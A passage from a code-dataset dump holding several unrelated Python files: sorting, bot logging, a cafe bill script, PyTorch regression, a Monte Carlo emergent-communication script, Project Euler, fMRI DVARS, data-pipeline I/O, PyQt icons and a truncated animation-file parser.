'__main__':\n\tA=[4,2,5,7,4,9,8,0,8,6]\n\n\tquick_sort(A,0,10)\n\n\tprint(A)","repo_name":"ziyang1996/data-structure","sub_path":"data_structure/快速排序.py","file_name":"快速排序.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24614028529","text":"import asyncio\nimport logging\nimport logging.handlers\n\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom tgbot.logging_helpers import Formatter, WarningErrorHandler\nfrom tgbot.helpers import EmptyContextVarException\nfrom tgbot.users import current_user\n\nLOG_MAX_SIZE = 10*2**20 # 10MB\nLOG_MAX_BACKUPS = 9\nold_log_record_factory = logging.getLogRecordFactory()\ndef log_record_factory(*args, **kwargs):\n record = old_log_record_factory(*args, **kwargs)\n try:\n record.username = current_user.pyrogram_user.log_name\n except (EmptyContextVarException, SQLAlchemyError):\n record.username = 'Василий'\n return record\n\n\nclass TGBotCoreMixin:\n\n def __init__(self):\n self.async_tasks = []\n self.monitor_task = None\n self.canceling = False\n 
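# The setup below installs log_record_factory (defined above) so every record carries the current user, then attaches a console handler (INFO) plus rotating file handlers for DEBUG and ERROR output.\n 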
logging.setLogRecordFactory(log_record_factory)\n self.log = logging.getLogger(self.bot_name)\n self.log.setLevel(logging.DEBUG)\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(logging.Formatter('%(message)s'))\n self.log.addHandler(console_handler)\n file_handler = logging.handlers.RotatingFileHandler(\n 'log.log',\n encoding='utf-8',\n maxBytes=LOG_MAX_SIZE,\n backupCount=LOG_MAX_BACKUPS\n )\n file_handler.setLevel(logging.DEBUG)\n detailed_formatter = Formatter(\n '%(asctime)s - %(levelname)s - %(module)s'\n '.%(funcName)s (%(lineno)d) | %(username)s\\n%(message)s'\n )\n file_handler.setFormatter(detailed_formatter)\n self.log.addHandler(file_handler)\n file_error_handler = logging.handlers.RotatingFileHandler(\n 'error.log',\n encoding='utf-8',\n maxBytes=LOG_MAX_SIZE,\n backupCount=LOG_MAX_BACKUPS,\n delay=True\n )\n file_error_handler.setLevel(logging.ERROR)\n file_error_handler.setFormatter(detailed_formatter)\n self.log.addHandler(file_error_handler)\n warning_error_handler = WarningErrorHandler(self)\n warning_error_handler.setFormatter(detailed_formatter)\n self.log.addHandler(warning_error_handler)\n super().__init__()\n\n def add_task(self, callable, *args, name=None, **kwargs):\n name = name or callable.__name__\n task = asyncio.create_task(callable(*args, **kwargs), name=name)\n self.async_tasks.append(task)\n if self.monitor_task:\n self.monitor_task.cancel()\n self.log.debug(f'Добавлена асинхронная задача {name}')\n\n async def monitor_tasks(self):\n while True:\n if self.canceling:\n break\n if not self.async_tasks:\n self.monitor_task = asyncio.create_task(asyncio.Event().wait())\n else:\n self.monitor_task = asyncio.create_task(\n asyncio.wait(\n self.async_tasks,\n return_when=asyncio.FIRST_COMPLETED\n )\n )\n try:\n done_tasks, pending_tasks = await self.monitor_task\n except asyncio.exceptions.CancelledError:\n if not self.canceling:\n continue\n break\n for task in done_tasks:\n try:\n task.result()\n self.log.debug(f'Асинхронная задача \"{task.get_name()}\" выполнена')\n except Exception:\n self.log.exception(f'Необработанное исключение в асинхронной задаче \"{task.get_name()}\": ')\n finally:\n self.async_tasks.remove(task)\n","repo_name":"Danstiv/cm-assistant","sub_path":"tgbot/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25367091336","text":"def showBill():\n\tnameCafe = \"N-Cafe\"\n\tprint(nameCafe.center(15, \"*\"))\n\tfor i in range(len(listMenu)):\n\t\tprint(str(i + 1) + \". 
\" + listMenu[i] + \" Price \" + str(listMenuPrice[i]))\n\tprint(\"Total Price :\", sum(listMenuPrice), \"THB\")\n\nlistMenu = []\nlistMenuPrice = []\n\n\nwhile True:\n\tmenuName = input(\"Please Enter New Menu : \")\n\tif menuName.lower() == \"exit\":\n\t\tbreak\n\telse:\n\t\tmenuPrice = int(input(\"Order Price : \"))\n\t\tlistMenu.append(menuName)\n\t\tlistMenuPrice.append(menuPrice)\nprint(listMenu)\nprint(listMenuPrice)\nshowBill()\n\n\n\n\n\n\n","repo_name":"shamonnop/CP3-Noppanut-Huttapad","sub_path":"Lecture71_Noppanut_H.py","file_name":"Lecture71_Noppanut_H.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33705144455","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n# @Time : 2020/5/12 22:08 \n# @Author : DZQ\n# @File : MyMutiLineRegression.py\n\nimport torch\nfrom torch import optim\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch import Tensor\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nw_target = torch.FloatTensor([0.5, 3, 2.4]).unsqueeze(1)\nb_target = torch.FloatTensor([0.9])\n\n\ndef union(x):\n x = x.unsqueeze(1)\n return torch.cat([x ** i for i in range(1, 4)], 1)\n\n\ndef f(x):\n return x.mm(w_target) + b_target\n\n\ndef get_batch(batch_size=32):\n x_data = torch.randn(batch_size)\n x_train = union(x_data)\n y_train = f(x_train)\n return Variable(x_train), Variable(y_train)\n\n\nclass MutiLineRegression(nn.Module):\n def __init__(self):\n super(MutiLineRegression, self).__init__()\n self.lr = nn.Linear(3, 1)\n\n def forward(self, x):\n return self.lr(x)\n\n\nmodel = MutiLineRegression()\noptimster = optim.SGD(model.parameters(), lr=1e-3)\ncrit = nn.MSELoss()\n\nsteps = 0\nwhile True:\n x_data, y_data = get_batch()\n out = model(x_data)\n loss = crit(out, y_data)\n if loss.data < 1e-8:\n break\n optimster.zero_grad()\n loss.backward()\n optimster.step()\n steps += 1\n if steps % 100 == 0:\n print(\"step: {}, loss: {:.8f}\".format(steps, loss.data))\n\nmodel.eval()\nprint(model.lr.weight[0].detach().numpy())\nprint(model.lr.bias.detach().numpy())\nbias = model.lr.bias.detach().numpy()\nweight = model.lr.weight[0].detach().numpy()\nx_data, y_data = get_batch()\nx_data = x_data.numpy()\nx_data = x_data[:,0]\ny_data = y_data.detach().numpy()\nplt.plot(x_data, y_data, 'ro')\nline = np.linspace(x_data.min(), x_data.max(), 500)\npredict = bias + weight[0] * line + weight[1] * (line ** 2) + weight[2] * (line ** 3)\nplt.plot(line, predict, 'b')\nplt.show()\n","repo_name":"dzqann/pytorch_study","sub_path":"day01/MyMutiLineRegression.py","file_name":"MyMutiLineRegression.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44751392647","text":"from copy import copy\nimport numpy as np\nimport random\n\nnum_episodes = 10000\nk = 100\neta = 0.8\ngamma = 0.95\n\nepsilon = 0.6\nmax_epsilon = 1.0\nmin_epsilon = 0.01\ndecay_rate = 0.005\n\nvocab_size = 4\nnum_types = 2\nnum_atts = 4\n\nmc_explore = True\nmc_update = False\n\na_table = np.zeros((num_atts, num_atts, vocab_size+1, vocab_size))\nq_table = np.zeros((vocab_size, vocab_size, num_atts, num_atts))\n\na_visited = np.zeros((num_atts, num_atts, vocab_size+1), dtype=bool)\nq_visited = np.zeros((vocab_size, vocab_size), dtype=bool)\n\nwins = 0\ntotal = 0\n\nfor episode in range(num_episodes):\n\ttradeoff = random.random()\n\texplore = (tradeoff < epsilon)\n\n\tinstance = 
(random.randint(0,num_atts-1), random.randint(0,num_atts-1))\n\ta_state = [instance[0], instance[1], vocab_size]\n\n\n\t# MONTE CARLO SEARCH:\n\tif explore | ~a_visited[a_state[0], a_state[1], a_state[2]]:\n\t\t# Explore:\n\t\t\n\t\toptions = np.zeros(vocab_size)\n\t\tcounts = np.zeros(vocab_size)\n\t\tfor i in range(k):\n\t\t\tchoice = random.randint(0,vocab_size-1)\n\t\t\ta_copy_state = copy(a_state)\n\t\t\ta_copy_state[2] = choice\n\t\t\tcopy_tradeoff = random.random()\n\t\t\tcopy_explore = (copy_tradeoff < epsilon)\n\t\t\tq_copy_state = [a_copy_state[2], vocab_size]\n\n\t\t\tif mc_explore | copy_explore | ~a_visited[a_copy_state[0], a_copy_state[1], a_copy_state[2]]:\n\t\t\t\t# Explore:\n\t\t\t\tsecond_word = random.randint(0,vocab_size-1)\n\t\t\t\tq_copy_state[1] = second_word\n\t\t\telse:\n\t\t\t\t# Exploit:\n\t\t\t\tif len(a_table[a_copy_state[0], a_copy_state[1], a_copy_state[2], :]) != vocab_size:\n\t\t\t\t\traise Exception(\"Incorrect table size.\")\n\t\t\t\tsecond_word = np.argmax(a_table[a_copy_state[0], a_copy_state[1], a_copy_state[2], :])\n\t\t\t\tq_copy_state[1] = second_word\n\n\t\t\tif mc_explore | copy_explore | ~q_visited[q_copy_state[0], q_copy_state[1]]:\n\t\t\t\t# Explore:\n\t\t\t\tcopy_guess = (random.randint(0,num_atts-1), random.randint(0,num_atts-1))\n\t\t\telse:\n\t\t\t\t# Exploit:\n\t\t\t\tvalues = q_table[q_copy_state[0], q_copy_state[1], :, :]\n\t\t\t\tcopy_guess = np.unravel_index(values.argmax(), values.shape)\n\n\t\t\tcopy_reward = -1\n\t\t\tif (instance == copy_guess):\n\t\t\t\tcopy_reward = 1\n\n\t\t\toptions[choice] += copy_reward\n\t\t\tcounts[choice] += 1\n\n\t\tfirst_word = np.argmax(options/counts)\n\t\ta_state[2] = first_word\n\n\t\tif mc_update:\n\t\t\tfor i in range(vocab_size):\n\t\t\t\ta_table[a_state[0], a_state[1], vocab_size, i] = options[i]\n\t\t\ta_visited[a_state[0], a_state[1], vocab_size] = True\n\n\telse:\n\t\t# Exploit:\n\t\tif len(a_table[a_state[0], a_state[1], a_state[2], :]) != vocab_size:\n\t\t\traise Exception(\"Incorrect table size.\")\n\t\tfirst_word = np.argmax(a_table[a_state[0], a_state[1], a_state[2], :])\n\t\ta_state[2] = first_word\n\n\tq_state = [a_state[2], vocab_size]\n\n\t# Get second action:\n\tif explore | ~a_visited[a_state[0], a_state[1], a_state[2]]:\n\t\t# Explore:\n\t\toptions = np.zeros(vocab_size)\n\t\tcounts = np.zeros(vocab_size)\n\t\tfor i in range(k):\n\t\t\tchoice = random.randint(0,vocab_size-1)\n\t\t\tq_copy_state = copy(q_state)\n\t\t\tq_copy_state[1] = choice\n\t\t\tcopy_tradeoff = random.random()\n\t\t\tcopy_explore = (copy_tradeoff < epsilon)\n\n\t\t\tif mc_explore | copy_explore | ~q_visited[q_copy_state[0], q_copy_state[1]]:\n\t\t\t\t# Explore:\n\t\t\t\tcopy_guess = (random.randint(0,num_atts-1), random.randint(0,num_atts-1))\n\t\t\telse:\n\t\t\t\t# Exploit:\n\t\t\t\tvalues = q_table[q_copy_state[0], q_copy_state[1], :, :]\n\t\t\t\tcopy_guess = np.unravel_index(values.argmax(), values.shape)\n\n\t\t\tcopy_reward = -1\n\t\t\tif (instance == copy_guess):\n\t\t\t\tcopy_reward = 1\n\n\t\t\toptions[choice] += copy_reward\n\t\t\tcounts[choice] += 1\n\n\t\tsecond_word = np.argmax(options/counts)\n\t\tq_state[1] = second_word\t\t\n\n\t\tif mc_update:\n\t\t\tfor i in range(vocab_size):\n\t\t\t\ta_table[a_state[0], a_state[1], a_state[2], i] = options[i]\n\t\t\ta_visited[a_state[0], a_state[1], a_state[2]] = True\n\n\n\telse:\n\t\t# Exploit:\n\t\tif len(a_table[a_state[0], a_state[1], a_state[2], :]) != vocab_size:\n\t\t\traise Exception(\"Incorrect table size.\")\n\t\tsecond_word = 
np.argmax(a_table[a_state[0], a_state[1], a_state[2], :])\n\t\tq_state[1] = second_word\n\n\n\n\t# Get Q-Bot guess:\n\tif explore | ~q_visited[q_state[0], q_state[1]]:\n\t\t# Explore:\n\t\toptions = np.zeros((num_atts, num_atts))\n\t\tguess = (random.randint(0,num_atts-1), random.randint(0,num_atts-1))\n\t\tfor i in range(num_atts):\n\t\t\tfor j in range(num_atts):\n\t\t\t\tcopy_guess = (i, j)\n\t\t\t\tif (instance == copy_guess):\n\t\t\t\t\tguess = copy_guess\n\t\t\t\t\toptions[i][j] += 1\n\t\t\t\telse:\n\t\t\t\t\toptions[i][j] -= 1\n\n\t\tif mc_update:\n\t\t\tfor i in range(num_atts):\n\t\t\t\tfor j in range(num_atts):\n\t\t\t\t\tq_table[q_state[0], q_state[1], i, j] = options[i][j]\n\t\t\tq_visited[q_state[0], q_state[1]] = True\n\telse:\n\t\t# Exploit:\n\t\tvalues = q_table[q_state[0], q_state[1], :, :]\n\t\tguess = np.unravel_index(values.argmax(), values.shape)\n\n\t# Calculate reward:\n\treward = -1\n\tif (instance == guess):\n\t\treward = 1\n\t# elif(instance[0] == guess[0] or instance[1] == guess[1]):\n\t# \treward = -.5\n\n\tif not mc_update:\n\t\tinitial_a_state = [instance[0], instance[1], vocab_size]\n\t\tfinal_a_state = a_state\n\n\t\ta_visited[initial_a_state[0], initial_a_state[1], initial_a_state[2]] = True\n\t\ta_table[initial_a_state[0], initial_a_state[1], initial_a_state[2], first_word] += reward\n\t\ta_visited[final_a_state[0], final_a_state[1], final_a_state[2]] = True\n\t\ta_table[final_a_state[0], final_a_state[1], final_a_state[2], second_word] += reward\n\n\t\tfinal_q_state = q_state\n\n\t\tq_visited[q_state[0], q_state[1]] = True\n\t\tq_table[q_state[0], q_state[1], guess[0], guess[1]] += reward\n\n\t# epsilon = min_epsilon + (max_epsilon - min_epsilon)*np.exp(-decay_rate*episode)\n\tif num_episodes > 5000 and not explore:\n\t\ttotal += 1\n\t\tif (instance == guess):\n\t\t\twins += 1\n\nprint(wins / total)\n# print(a_table)","repo_name":"nickatomlin/Emergent","sub_path":"src/agents/tabular_montecarlo.py","file_name":"tabular_montecarlo.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"33001158003","text":"import math\n\n# Prime factorization (Sieve) code from https://www.geeksforgeeks.org/print-all-prime-factors-of-a-given-number/\ndef primeFactors(n):\n factors = []\n while n % 2 == 0:\n factors.append(2)\n n = n / 2\n\n for i in range(3, int(math.sqrt(n)) + 1, 2):\n while n % i == 0:\n factors.append(int(i))\n n = n / i\n\n if n > 2:\n factors.append(int(n))\n return factors\n\n\ndef allFactors(n):\n factors = primeFactors(n)\n while True:\n _ = factors.copy()\n for factor in factors:\n for j in factors:\n newvalue = factor*j\n if newvalue not in factors and n % newvalue == 0:\n factors.append(newvalue)\n if _ == factors:\n break\n if n in factors: # BAD SOLUTION - THIS IS A HACK\n factors.remove(n)\n factors.append(1)\n factors = list(dict.fromkeys(factors))\n factors.sort()\n return factors\n\n\ndef d(n):\n return sum(allFactors(n))\n\n\nall_pairs = []\nrev_pairs = []\nami_pairs = []\n\nfor i in range(1, 10001):\n match = [i, d(i)]\n all_pairs.append(match)\n\nprint(\"Found d(n) for n in (1, 10000)\")\n\nfor pair in all_pairs:\n rev_pairs.append([pair[1], pair[0]])\n\nfor pair in rev_pairs:\n if pair in all_pairs:\n if pair[0] != pair[1]:\n ami_pairs.append(pair)\n\nprint(ami_pairs)\n\n\nsolution = []\n\nfor pair in ami_pairs:\n solution.append(pair[0])\n solution.append(pair[1])\n\nprint(solution)\nsolution2 = 
list(dict.fromkeys(solution))\n\nprint(solution2)\nprint(sum(solution2))\n","repo_name":"andytfma/python-project-euler","sub_path":"5% difficulty problems/solution21_amicable.py","file_name":"solution21_amicable.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38458379751","text":"# dvars_se.py\n\"\"\"\nCompute DVARS on single echo EPI data.\n\nFor usage see: python dvars_se.py -h\n\nExample usage:\npython dvars_se.py -d rest_sm.nii.gz\n\"\"\"\n\n# import modules\nimport numpy as np\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nfrom optparse import OptionParser\nimport pandas as pd\n\n\n# function to parse input arguments\ndef parse_args():\n \"\"\"\n Parse arguments.\n \"\"\"\n parser=OptionParser()\n parser.add_option('-d',\"\",dest='data',help=\"EPI data to compute DVARS on file ex: -d rest_sm.nii.gz\",default=None)\n parser.add_option('-p',\"\",action=\"store_true\",dest='plot',help=\"Make DVARS plot\",default=False)\n (options,args) = parser.parse_args()\n return(options)\n\ndef make_plot(data):\n \"\"\"\n Make DVARS plot\n \"\"\"\n plt.plot(data)\n plt.xlabel(\"Frame #\")\n plt.ylabel(\"DVARS (%x10)\")\n plt.show()\n\n\ndef compute_summary_stats(dvars):\n \"\"\"\n Compute summary stats.\n \"\"\"\n summary_stats = {\"meanDVARS\":dvars.mean(), \"medianDVARS\":np.median(dvars),\n \"minDVARS\":dvars.min(), \"maxDVARS\":dvars.max()}\n return(summary_stats)\n\ndef write_summary_stats(summary_stats, outname):\n \"\"\"\n Write summary stats to file.\n \"\"\"\n\n outseries = pd.Series(summary_stats)\n outseries.to_csv(outname)\n\n\n\n# boilerplate code to call main code for executing\nif __name__ == '__main__':\n\n # Parse arguments\n opts = parse_args()\n data_file = opts.data\n\n # load data\n nii = data_file\n fn = nib.load(nii)\n\n # get data and vectorize\n nx,ny,nz,nt = fn.get_data().shape\n data = fn.get_data().reshape([nx*ny*nz,nt]).T\n\n # compute mean\n d_mu = data.mean(0)\n\n # compute mask\n d_mask = d_mu!=0\n\n # grab voxels within mask\n db=data[:,d_mask]\n\n # compute DVARS\n dbdt = np.abs(np.diff(db,n=1,axis=0))+0.0000001\n dvars = np.sqrt(np.mean(dbdt**2,1))\n\n # save DVARS to text file\n np.savetxt('%s_dvars.txt' % nii.split('.')[0],dvars)\n\n # save summary stats to a file\n summary_stats = compute_summary_stats(dvars)\n outname = '%s_dvars_summary_stats.csv' % (data_file.split('.')[0])\n write_summary_stats(summary_stats, outname)\n\n # make plot\n if opts.plot:\n make_plot(dvars)\n","repo_name":"mvlombardo/rsfmri","sub_path":"dvars_se.py","file_name":"dvars_se.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"15321837705","text":"'''Supports the reading and writing of files for the DimensionCollector.\n'''\nfrom builtins import next\nfrom util.file.unicode_csv import UnicodeDictReader, UnicodeDictWriter\n\n# The column name used when the non-hierarchical dimensions are written to a file.\nDIMENSION_TYPE_COLUMN = 'dimension'\n\n\ndef add_prefix(prefix, text):\n return f'{prefix}{text}'\n\n\n# TODO: There is a lot of weird indirection in the utilities in this\n# file. 
We should make the I/O operations a lot more straightforward.\n\n\nclass DimensionCollectorReader:\n '''Reads through a file outputted by a DimensionCollector.'''\n\n def __init__(self, open_file, prefix, dimensions, is_dimension_collector_source):\n self.prefix = prefix\n self.dimensions = dimensions\n self.reader = UnicodeDictReader(open_file)\n\n def __iter__(self):\n return self\n\n def extract_values(self, row: dict) -> dict:\n raise ValueError('Must be implemented by subclass')\n\n def __next__(self):\n # NOTE: This will raise a StopIteration when there are no more\n # items left, and should be used with a for loop.\n return self.extract_values(next(self.reader))\n\n\nclass HierarchicalDimensionCollectorReader(DimensionCollectorReader):\n def __init__(self, is_dimension_collector_source, *args, **kwargs):\n super().__init__(is_dimension_collector_source, *args, **kwargs)\n self.is_dimension_collector_source = is_dimension_collector_source\n self.extraction_map = {\n dimension_name: add_prefix(self.prefix, dimension_name)\n for dimension_name in self.dimensions\n }\n\n def extract_values(self, row: dict) -> dict:\n # If this is a legacy source, then we can just return the row\n if not self.is_dimension_collector_source:\n return row\n\n return {\n dimension_name: row[mapping_key]\n for dimension_name, mapping_key in self.extraction_map.items()\n }\n\n\nclass NonHierarchicalDimensionCollectorReader(DimensionCollectorReader):\n def extract_values(self, row: dict) -> dict:\n return {row[DIMENSION_TYPE_COLUMN]: row[self.prefix]}\n\n\ndef build_combined_header(dimension_list, input_prefix, output_prefix):\n '''Returns a list where the first half of the list are the elements in\n dimension_list with 'input' prepended, and then 'output'.\n '''\n header = []\n for prefix in (input_prefix, output_prefix):\n for dimension_name in dimension_list:\n header.append(add_prefix(prefix, dimension_name))\n\n return header\n\n\ndef write_hierarchical_dimensions(\n collector,\n hierarchical_filename,\n input_prefix,\n output_prefix,\n unmatched_filename=None,\n):\n handle_unmatched = unmatched_filename is not None\n # NOTE: Default the filename to '/dev/null' here (which would have no effect) to be\n # able to conditionally open an unmatched file\n unmatched_filename = unmatched_filename or '/dev/null'\n\n with open(hierarchical_filename, 'w') as hierarchical_file, open(\n unmatched_filename, 'w'\n ) as unmatched_file:\n header = build_combined_header(\n collector.HIERARCHICAL_DIMENSIONS, input_prefix, output_prefix\n )\n hierarchical_writer = UnicodeDictWriter(hierarchical_file, header)\n hierarchical_writer.writeheader()\n if handle_unmatched:\n unmatched_writer = UnicodeDictWriter(unmatched_file, header)\n unmatched_writer.writeheader()\n\n for dimension_dict in collector.hierarchical_combinations.values():\n item_dict = {}\n for dimension_name in collector.HIERARCHICAL_DIMENSIONS:\n input_dimension = dimension_dict['input'].get(dimension_name, '')\n output_dimension = dimension_dict['output'].get(dimension_name, '')\n\n item_dict.update(\n {\n add_prefix(input_prefix, dimension_name): input_dimension,\n add_prefix(output_prefix, dimension_name): output_dimension,\n }\n )\n\n if handle_unmatched and not output_dimension and input_dimension:\n # If the output dimension is empty for a non empty input dimension\n # this means the dimension was unmatched at this dimension level.\n # Therefore we write it to the unmatched locations file.\n unmatched_writer.writerow(item_dict)\n\n 
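# Matched or not, every combination is also written to the hierarchical file below; the unmatched file above only receives the subset that failed to match.\n 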
hierarchical_writer.writerow(item_dict)\n\n\ndef write_non_hierarchical_dimensions(\n collector,\n filename,\n input_text,\n output_text,\n unmatched_filename=None,\n):\n handle_unmatched = unmatched_filename is not None\n # NOTE: Default the filename to '/dev/null' here (which would have no effect) to be\n # able to conditionally open an unmatched file\n unmatched_filename = unmatched_filename or '/dev/null'\n\n with open(filename, 'w') as non_hierarchical_file, open(\n unmatched_filename, 'w'\n ) as unmatched_file:\n header = [DIMENSION_TYPE_COLUMN, input_text, output_text]\n writer = UnicodeDictWriter(non_hierarchical_file, header)\n writer.writeheader()\n if handle_unmatched:\n unmatched_writer = UnicodeDictWriter(unmatched_file, header)\n unmatched_writer.writeheader()\n\n for dimension_name, val_dict in collector.non_hierarchical_items.items():\n for original_val, transformed_val in val_dict.items():\n item_dict = {\n DIMENSION_TYPE_COLUMN: dimension_name,\n input_text: original_val,\n output_text: transformed_val,\n }\n\n if handle_unmatched and not transformed_val:\n # If the transformed_val is empty this means the dimension was unmatched.\n # Therefore we write it to the unmatched non-hierarchical dimensions file.\n unmatched_writer.writerow(item_dict)\n\n writer.writerow(item_dict)\n","repo_name":"Zenysis/Harmony","sub_path":"data/pipeline/datatypes/dimension_collector_io.py","file_name":"dimension_collector_io.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"8743356617","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui\n\nclass MyWindow(QtGui.QWidget):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.resize(300, 150)\n self.my_icon = QtGui.QIcon()\n self.my_icon.addFile(\"icon1.png\", QtCore.QSize(32, 32),\n mode=QtGui.QIcon.Normal)\n self.my_icon.addPixmap(QtGui.QPixmap(\"icon2.png\"),\n mode=QtGui.QIcon.Normal)\n self.my_icon.addFile(\"icon3.png\", QtCore.QSize(32, 32),\n mode=QtGui.QIcon.Disabled)\n self.pix1 = self.my_icon.pixmap(32, 32, mode=QtGui.QIcon.Normal)\n self.pix2 = self.my_icon.pixmap(16, 16, mode=QtGui.QIcon.Normal)\n self.pix3 = self.my_icon.pixmap(32, 32,\n mode=QtGui.QIcon.Disabled)\n self.my_icon2 = self.style().standardIcon(\n QtGui.QStyle.SP_MessageBoxCritical)\n self.pix4 = self.my_icon2.pixmap(32, 32, mode=QtGui.QIcon.Normal)\n self.pix5 = self.my_icon2.pixmap(32, 32,\n mode=QtGui.QIcon.Disabled)\n print(self.my_icon.availableSizes(mode=QtGui.QIcon.Normal))\n print(self.my_icon.availableSizes(mode=QtGui.QIcon.Disabled))\n print(self.my_icon.actualSize(QtCore.QSize(16, 16),\n mode=QtGui.QIcon.Normal))\n\n def paintEvent(self, e):\n painter = QtGui.QPainter(self)\n painter.drawPixmap(5, 10, self.pix1)\n painter.drawPixmap(50, 10, self.pix2)\n painter.drawPixmap(100, 10, self.pix3)\n painter.drawPixmap(150, 10, self.pix4)\n painter.drawPixmap(200, 10, self.pix5)\n\nif __name__ == \"__main__\":\n import sys\n app = QtGui.QApplication(sys.argv)\n window = MyWindow()\n window.setWindowTitle(\"Класс QIcon\")\n window.show()\n sys.exit(app.exec_())","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/006_Working with graphics/003_Working with Images/555. QIcon.py","file_name":"555. 
QIcon.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16849647501","text":"import struct\n\n\n# edgeanim_skeleton\nclass EdgeAnimUserChannelFlags:\n EDGE_ANIM_USER_CHANNEL_FLAG_CLAMP01 = 0x01\n EDGE_ANIM_USER_CHANNEL_FLAG_MINMAX = 0x02\n EDGE_ANIM_USER_CHANNEL_FLAG_CPT_SHIFT = 0x03\n EDGE_ANIM_USER_CHANNEL_FLAG_CPT_BIT1 = 0x08\n EDGE_ANIM_USER_CHANNEL_FLAG_CPT_BIT0 = 0x10\n\n\nclass EdgeAnimationSkeleton:\n def __init__(self, data):\n if data[0:4] == b'60SE':\n self.bigEndian = False\n elif data[0:4] == b'ES06':\n self.bigEndian = True\n print(\"Support for big endian file is very experimental\")\n else:\n print(\"Skeleton File Incorrect\")\n return\n\n self.length = len(data)\n self.data = data\n\n self.tag, \\\n self.izeTotal, \\\n self.sizeCustomData, \\\n self.sizeNameHashes, \\\n self.numJoints, \\\n self.numUserChannels, \\\n self.flags, \\\n self.locomotionJointIndex, \\\n self.offsetBasePose, \\\n self.offsetJointLinkageMap, \\\n self.offsetJointNameHashArray, \\\n self.offsetUserChannelNameHashArray, \\\n self.offsetUserChannelNodeNameHashArray, \\\n self.offsetUserChannelFlagsArray, \\\n self.offsetCustomData, \\\n self.pad1, \\\n self.pad2, \\\n self.numJointLinkages, \\\n self.jointLinkage0 = \\\n struct.unpack(('<', '>')[self.bigEndian] + '4I4H10IH', data[:66])\n\n self.offsetBasePose += 0x18\n self.offsetJointLinkageMap += 0x1c\n self.offsetJointNameHashArray += 0x20\n self.offsetUserChannelNameHashArray += 0x24\n self.offsetUserChannelNodeNameHashArray += 0x28\n self.offsetUserChannelFlagsArray += 0x2c\n\nclass UserChannelInfo:\n def __init__(self, nodeNameHash = None, channelNameHash = None, componentIndex = None, flags = None):\n self.m_nodeNameHash = nodeNameHash\n self.m_channelNameHash = channelNameHash\n self.m_componentIndex = componentIndex\n self.m_flags = flags\n\nclass Skeleton:\n def __init__(self):\n self.m_locoJointIndex = None\n self.m_numJoints = None\n self.m_numUserChannels = None\n self.m_parentIndices = []\n self.m_basePose = []\n self.m_scaleCompensateFlags = []\n self.m_jointNameHashes = None\n self.m_userChannelInfoArray = []\n self.m_customData = None\n\n\n# edgeanim_animation\nclass AnimationKeyframe:\n kKeyFrameStepped = (1 << 0)\n kKeyFrameMask = kKeyFrameStepped\n\n def __init__(self):\n self.m_keyTime = 0.0\n self.m_keyData = [0.0, 0.0, 0.0, 0.0]\n self.m_keyFlags = 0\n\n\nclass EdgeAnimAnimationEncodingFlags:\n EDGE_ANIM_FLAG_BIT_PACKED_R = 0x01\n EDGE_ANIM_FLAG_BIT_PACKED_T = 0x02\n EDGE_ANIM_FLAG_BIT_PACKED_S = 0x04\n EDGE_ANIM_FLAG_BIT_PACKED_U = 0x08\n EDGE_ANIM_FLAG_RAW_R = 0x10\n\n\nclass EdgeAnimAnimation:\n def __init__(self, data):\n if data[0:4] == b'80AE':\n self.bigEndian = False\n elif data[0:4] == b'EA08':\n self.bigEndian = True\n print(\"Support for big endian file is very experimental\")\n else:\n print(\"Animation File Incorrect\")\n return\n\n self.length = len(data)\n self.data = data\n\n self.tag, \\\n self.duration, \\\n self.sampleFrequency, \\\n self.sizeHeader, \\\n self.numJoints, \\\n self.numFrames, \\\n self.numFrameSets, \\\n self.evalBufferSizeRequired, \\\n self.numConstRChannels, \\\n self.numConstTChannels, \\\n self.numConstSChannels, \\\n self.numConstUserChannels, \\\n self.numAnimRChannels, \\\n self.numAnimTChannels, \\\n self.numAnimSChannels, \\\n self.numAnimUserChannels, \\\n self.numUserChannels, \\\n self.sizeJointsWeightArray, \\\n self.sizeUserChannelWeightArray, \\\n self.flags, \\\n 
